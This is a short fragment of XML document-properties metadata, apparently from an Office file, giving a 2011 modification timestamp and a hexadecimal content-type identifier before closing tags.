  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-12-27T13:40:35Z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0x0101003E71EF78F52E3942BDCB384E939F952C</vt:lpwstr>
  </property>
</Properties>
</file>